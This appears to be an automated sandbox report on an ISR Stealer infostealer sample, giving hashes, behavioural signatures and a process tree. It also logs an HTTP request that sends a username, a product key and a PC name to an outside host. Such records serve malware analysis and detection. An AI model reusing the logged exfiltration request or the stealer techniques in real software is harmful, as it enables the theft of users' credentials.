Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-10-2024 22:00
Static task
static1
Behavioral task
behavioral1
Sample
26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe
-
Size
946KB
-
MD5
26148b8e4595061e7716246a926c2eed
-
SHA1
1a61f0eea11b5cade43f03aea8eda112ee23480c
-
SHA256
31f9e2b98f96265b9f0b50baa0745dd88077b0a1c3adeb4047d66a6fe801e1a3
-
SHA512
98eaf519c6d069f9bbeb6c4b71a87dca4a8fbf6ed77bda73280f2187c64d148af633a5c4ed0ce11e7ffba4c04e8c1796e42c0b9ba1232733b8f32869f1f5f7a7
-
SSDEEP
12288:6aWzgMg7v3qnCiMErQohh0F4CCJ8lny/QLway9wv+U4iG+D:1aHMv6Corjqny/QLE91FiP
Malware Config
Signatures
-
ISR Stealer
ISR Stealer is a modified version of Hackhound Stealer written in visual basic.
-
ISR Stealer payload 1 IoCs
resource yara_rule behavioral1/files/0x00090000000120f1-2.dat family_isrstealer -
Executes dropped EXE 1 IoCs
pid Process 2380 Server.exe -
Loads dropped DLL 5 IoCs
pid Process 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2380 Server.exe 2380 Server.exe 2380 Server.exe 2380 Server.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2380 Server.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 860 wrote to memory of 2380 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 30 PID 860 wrote to memory of 2380 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 30 PID 860 wrote to memory of 2380 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 30 PID 860 wrote to memory of 2380 860 26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2380
-
Network
-
Remote address:8.8.8.8:53Requesttapion.bplaced.netIN AResponsetapion.bplaced.netIN A162.55.0.137
-
GEThttp://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=MicrosoftServer.exeRemote address:162.55.0.137:80RequestGET /gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft HTTP/1.1
User-Agent: HardCore Software For : Public
Host: tapion.bplaced.net
ResponseHTTP/1.1 403 Forbidden
Server: Apache
X-BP-NSA-REQID: (null) a.14UID=98
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
ETag: "1bbf-5ea8944ceff23"
Accept-Ranges: bytes
Content-Length: 7103
Vary: Accept-Encoding
Content-Type: text/html
-
162.55.0.137:80http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=MicrosofthttpServer.exe580 B 7.8kB 8 8
HTTP Request
GET http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=MicrosoftHTTP Response
403
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
76KB
MD5afceef7f15a12be583888fd4cf6c78c4
SHA15574539642da242642b84ab6216edaa3f0bc159e
SHA25633d03627bd449f6dc01bffbb5cc3fb8ebe95dc0f9eb036758440d7e5affbaa4f
SHA51249ea1eeb55f07cc49f55b4337d4dbd537195d689c8c4336aa09e1723273431356f4e493d40f00b61735982924010fdcadbf4d2cd41c74351d1ff4e36e33e27e6